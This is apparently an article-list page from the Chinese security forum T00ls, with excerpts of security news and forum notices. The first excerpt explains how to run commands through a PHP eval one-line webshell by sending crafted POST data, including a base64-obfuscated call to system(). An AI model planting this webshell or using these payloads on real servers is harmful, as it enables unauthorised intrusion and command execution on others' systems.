文章列表
一句话脱离菜刀执行命令
是否还在当心菜刀有后门导致webshell被盗?一句话就一定要在菜刀里使用?当然不是,我们完全可以模拟post包来实现一句话的执行,方法如下:1.假设一句话为:<?php eval($_POST)?>2.执行phpinfo()时post提交:cmd=phpinfo();执行tasklist时,post提交:cmd=$a=dGFza2xpc3Q;$b=base64_decode($a);system($b); (
T00ls全面开启微信一键登录
一、T00ls全面开启微信一键登录。对于注册会员以上级别的用户,只要绑定了微信,在T00ls官方微信聊天框里输入5,则可以无需输入用户名与密码一键登录T00ls。二、移动端访问T00ls页面可脱离论坛访问。目前T00ls首页各客户端含移动端均自适应,但论坛不支持移动端访问,因此进行调整:对于注册会员以上级
美司法部指控7名伊朗黑客对美国企业、银行等发动DDoS攻击
据外媒报道,今天美国司法部总检察长Loretta E. Lynch指控称,七名伊朗黑客曾对美国企业、主要金融机构发动DDoS攻击,并入侵了纽约一个小型水坝的SCADA系统。 这七名伊朗男子分别是 Ahmad Fathi、 Hamid Firoozi、Amin Shokohi、Sadegh Ahmadzadegan、 Omid Ghaffarinia、Sina Keissar及 Nader Saedi。
Verizon企业客户信息遭黑客偷窃 售价十万美元
根据安全记者Brian Krebs的报道,信息是从Verizon的企业解决方案中被窃取的,该解决方案为很多大型公司提供信息服务,而它自身就常常需要面对并解决大量信息泄露的任务。记者Krebs报道说,大约有150万企业客户的信息被泄露并在一个论坛上售卖,而该公司的无线客户则没有受到该事件的影响。根据Verizon
关于T00ls全面封杀弱口令的公告
作为安全论坛,长久以来,我们在安全上也花了很多功夫。T00ls是国内安全网站中的一个使用SSL加密的网站。T00ls开发了微信绑定,并记录了登录日志。T00ls也曾经开发过2次验证,但是因为不是很好用而淘汰了。目前而言我们只能依赖原始discuz的机制,帐号密码+提示问题,并且我们强制要求不设置提示问题的
8.5亿安卓设备仍受Stagefright漏洞影响 已被发现一年
声名狼藉的Stagefright漏洞已经被发现近一年了,但超过8.5亿安卓设备仍在遭受它的潜在威胁,不计其数的智能手机和平板电脑仍处于被劫持的风险之中。Stagefight漏洞由网络安全团队Zimperium的研究员乔舒亚·德雷克(Joshua Drake)在去年发现,它被称为“迄今发现最严重的安卓漏洞之一”。Stagefight漏
关于某云报T00ls某登录撞库漏洞的说明
下午有元老告知某云爆出T00ls漏洞,因为无某云账号,第一时间检查代码,发现确实在尝试登录错误超过5次后没对IP进行暂停15分钟(Discuz的原有机制,在二次开发时由于没有showmessage暂时注释了)的处理。现已修复。本着负责任的漏洞审批机制,这确实属于漏洞,而且漏洞发布人确实跑出两个帐号,所以还
无线鼠标存在安全漏洞 当心电脑被黑客控制
近日,信息安全公司Bastille Networks的一项研究表明,黑客可以通过无线鼠标的安全漏洞入侵家庭或公司网络。研究人员表示,大多数无线鼠标与接收器之间交换的通信信号都是不加密的,这就使得黑客可以向接收器传递不加密信号并模拟计算机键盘,随意控制电脑。黑客只需要花费20美元购买天线和接收器,通
“匿名者”因比利时恐怖袭击再次正面向ISIS宣战
就像在去年11月份发生巴黎恐怖袭击之后的反应一样,现在,黑客组织匿名者(Anonymous)就比利时恐怖袭击事件向恐怖组织IS发布警告,他们将对其展开一系列的网络攻击。匿名者在YouTube上传的视频中指出:“我们日常都有在进行反恐工作,我们已经禁掉了上千个跟ISIS存有直接关联的Twitter账号......我们在
超六成受访企业无法识别黑客入侵
安永会计师事务所发布的《第18届全球信息安全调查报告》显示,尽管企业在构建网络安全方面已取得很大进展,但仍有66%的全球受访企业表示无法识别黑客入侵。据介绍,安永此次调查了来自全球67个国家、覆盖超过85个主要行业的1755家企业,其中中国企业有109家。安永大中华区信息安全咨询服务合伙人阮祺康
